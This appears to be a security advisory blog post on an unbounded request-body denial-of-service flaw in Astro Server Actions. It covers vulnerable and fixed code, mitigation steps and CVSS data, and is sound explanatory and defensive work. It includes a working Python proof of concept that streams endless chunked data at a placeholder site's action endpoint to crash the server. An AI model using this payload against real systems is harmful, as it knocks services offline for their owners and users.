Feb 26, 2026·5 min read·10 visits
Astro versions 9.0.0 to 9.5.3 accept unlimited request body sizes for Server Actions. An attacker can send a large payload (e.g., 500MB) to any action endpoint, causing the Node.js process to run out of memory (OOM) and crash. This leads to persistent downtime, especially in containerized environments where the service enters a crash-restart loop.
A fundamental oversight in how the Astro web framework handles Server Actions created a trivial Denial of Service vector. By failing to enforce a maximum request body size, Astro allowed unauthenticated attackers to feed unlimited data into the Node.js runtime, triggering a heap allocation failure and crashing the application process. This vulnerability specifically affects the `astro` and `@astrojs/node` packages in standalone mode.
Modern full-stack frameworks love 'Server Actions'. It's the shiny new paradigm where you write a function in your backend code, export it, and the framework magically wires up the RPC layer. It feels like magic. But magic often requires a suspension of disbelief—or in this case, a suspension of security best practices.
In Astro, Server Actions are designed to handle form submissions and data mutations. When you click that 'Subscribe' button, Astro serializes the form data, sends a POST request, and processes it on the server. Ideally, this process is swift, validated, and strictly bounded.
However, prior to version 9.5.4, Astro forgot one of the golden rules of internet plumbing: never trust the client's capacity to shut up. The framework implicitly trusted that the incoming request body would be reasonable in size. It didn't ask "How much data are you sending?" It just opened its mouth and swallowed whatever the client fed it.
The vulnerability resides in the parseRequestBody function within Astro's runtime. When a request hits a Server Action endpoint, the framework needs to parse the payload to make it accessible to your code. In the Node.js adapter, this was implemented using standard Fetch API methods like request.json() or request.formData().
Here is the problem: In a Node.js environment, these convenience methods attempt to buffer the entire request body into memory before parsing it. Unlike a streaming parser that processes data chunk-by-chunk, request.json() waits for the whole payload to arrive.
Node.js runs on the V8 engine, which has a default heap size limit (often around 1.5GB to 2GB depending on the version and flags). If an attacker sends a payload larger than the available heap space—say, a 2GB stream of the letter 'A'—V8 attempts to allocate memory for the string, fails, and throws a fatal error: FATAL ERROR: JavaScript heap out of memory.
Because this happens deep inside the framework's request handling logic—before your user-land validation code even runs—you cannot catch this error with a try/catch block in your action. The process simply dies.
Let's look at the smoking gun. In the vulnerable versions, the code looked something like this (simplified for dramatic effect):
// The "Trusting" Implementation
export async function parseRequestBody(request: Request) {
const contentType = request.headers.get('Content-Type');
if (contentType === 'application/json') {
// VULNERABLE: Buffers entire body to heap
return await request.json();
}
// ... formData handling
}The fix, introduced in commit 522f880b07a4ea7d69a19b5507fb53a5ed6c87f8, is a masterclass in defensiveness. The developers realized they couldn't rely on the high-level json() method anymore. They had to get their hands dirty with streams.
Here is the corrected logic using a manual reader:
// The "Paranoid" Implementation (Fix)
const DEFAULT_ACTION_BODY_SIZE_LIMIT = 1024 * 1024; // 1MB
async function readRequestBodyWithLimit(request: Request, limit: number) {
const reader = request.body.getReader();
let received = 0;
const chunks = [];
while (true) {
const { done, value } = await reader.read();
if (done) break;
received += value.byteLength;
// THE GUARD RAIL
if (received > limit) {
throw new ActionError({
code: 'CONTENT_TOO_LARGE',
message: `Request body exceeds ${limit} bytes`
});
}
chunks.push(value);
}
// ... reconstruct and parse
}This new implementation checks the Content-Length header first (the polite check), but also manually counts bytes as they stream in (the "I don't trust you" check). If the counter ticks past 1MB, it severs the connection immediately.
Exploiting this is trivially easy. You don't need shellcode, you don't need ROP chains, and you don't need authentication. You just need curl or a simple Python script.
/_actions/someActionName.Here is a Python PoC that uses chunked encoding to bypass any potential frontend proxies that might filter by Content-Length header alone (though the vulnerability is in the buffering itself):
import requests
def generate_trash():
# Generate a stream of garbage
while True:
yield b'A' * 1024 # 1KB chunks
url = "http://target-astro-site.com/_actions/login"
headers = {
"Content-Type": "application/json",
"Transfer-Encoding": "chunked"
}
try:
# Send a never-ending stream until the server dies
response = requests.post(url, data=generate_trash(), headers=headers, stream=True)
except requests.exceptions.ConnectionError:
print("Target down! Connection severed.")When this runs against a vulnerable Astro server, the Node.js process attempts to construct a string from the incoming chunks. Once the buffer hits the V8 heap limit (~1.5GB), the process crashes hard. In a Kubernetes cluster, the pod will restart, the attacker hits it again, and you enter CrashLoopBackOff.
The immediate fix is to upgrade to Astro v9.5.4 or higher. This version applies a hard 1MB cap on request bodies for server actions.
If you cannot upgrade immediately, you must enforce limits at the infrastructure layer:
client_max_body_size./_actions/* paths.This vulnerability highlights a critical difference between "Serverless/Edge" environments and long-lived Node.js processes. In Edge environments (like Cloudflare Workers), the runtime often enforces strict limits on request bodies automatically. In a standalone Node.js server, you are the runtime. You are responsible for every byte that enters memory. Never assume the framework defaults are safe for production without verifying resource limits.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
astro withastro | >= 9.0.0, < 9.5.4 | 9.5.4 |
@astrojs/node withastro | >= 9.0.0, < 9.5.4 | 9.5.4 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| CWE Name | Allocation of Resources Without Limits or Throttling |
| Attack Vector | Network |
| CVSS Score | 5.9 (Medium) |
| Impact | Denial of Service (DoS) |
| EPSS Score | 0.0007 |